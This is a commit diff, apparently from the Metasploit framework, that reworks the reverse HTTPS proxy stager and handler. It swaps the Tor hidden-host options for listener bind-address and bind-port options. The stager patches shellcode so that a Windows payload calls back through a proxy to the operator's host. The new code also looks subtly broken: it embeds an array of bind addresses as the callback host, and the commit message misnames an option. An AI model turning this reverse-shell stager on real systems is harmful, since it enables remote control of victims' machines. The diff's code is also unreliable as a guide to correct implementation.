Update reverse_https_proxy stager/handler

This change updates the proxy handler code, which for some reason was
ommitted in the orginal commits. This now uses the same mechanism as
the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead
uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`.

Author: OJ

lib/msf/core/handler/reverse_https_proxy.rb

@@ -42,13 +42,17 @@ def initialize(info = {})
         OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
         OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
         OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
-        OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
-        OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
         OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
         OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
         OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
  			], Msf::Handler::ReverseHttpsProxy)
 
+    register_advanced_options(
+      [
+        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
+        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
+      ], Msf::Handler::ReverseHttpsProxy)
+
   end
 
 end

modules/payloads/stagers/windows/reverse_https_proxy.rb

@@ -134,11 +134,7 @@ def generate
     p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
 
     # patch the LPORT
-    unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
-      lport = datastore['HIDDENPORT']
-    else
-      lport = datastore['LPORT']
-    end
+    lport = bind_port
 
     lportloc = p.index("\x68\x5c\x11\x00\x00")  # PUSH DWORD 4444
     p[lportloc+1] = [lport.to_i].pack('V')[0]
@@ -148,11 +144,7 @@ def generate
 
     # append LHOST and return payload
 
-    unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
-      lhost = datastore['HIDDENHOST']
-    else
-      lhost = datastore['LHOST']
-    end
+    lhost = bind_address
     p + lhost.to_s + "\x00"
 
   end
@@ -163,5 +155,33 @@ def generate
   def wfs_delay
     20
   end
+
+protected
+
+  def bind_port
+    port = datastore['ReverseListenerBindPort'].to_i
+    port > 0 ? port : datastore['LPORT'].to_i
+  end
+
+  def bind_address
+    # Switch to IPv6 ANY address if the LHOST is also IPv6
+    addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
+    # First attempt to bind LHOST. If that fails, the user probably has
+    # something else listening on that interface. Try again with ANY_ADDR.
+    any = (addr.length == 4) ? "0.0.0.0" : "::0"
+
+    addrs = [ Rex::Socket.addr_ntoa(addr), any  ]
+
+    if not datastore['ReverseListenerBindAddress'].to_s.empty?
+      # Only try to bind to this specific interface
+      addrs = [ datastore['ReverseListenerBindAddress'] ]
+
+      # Pick the right "any" address if either wildcard is used
+      addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
+    end
+
+    addrs
+  end
+
 end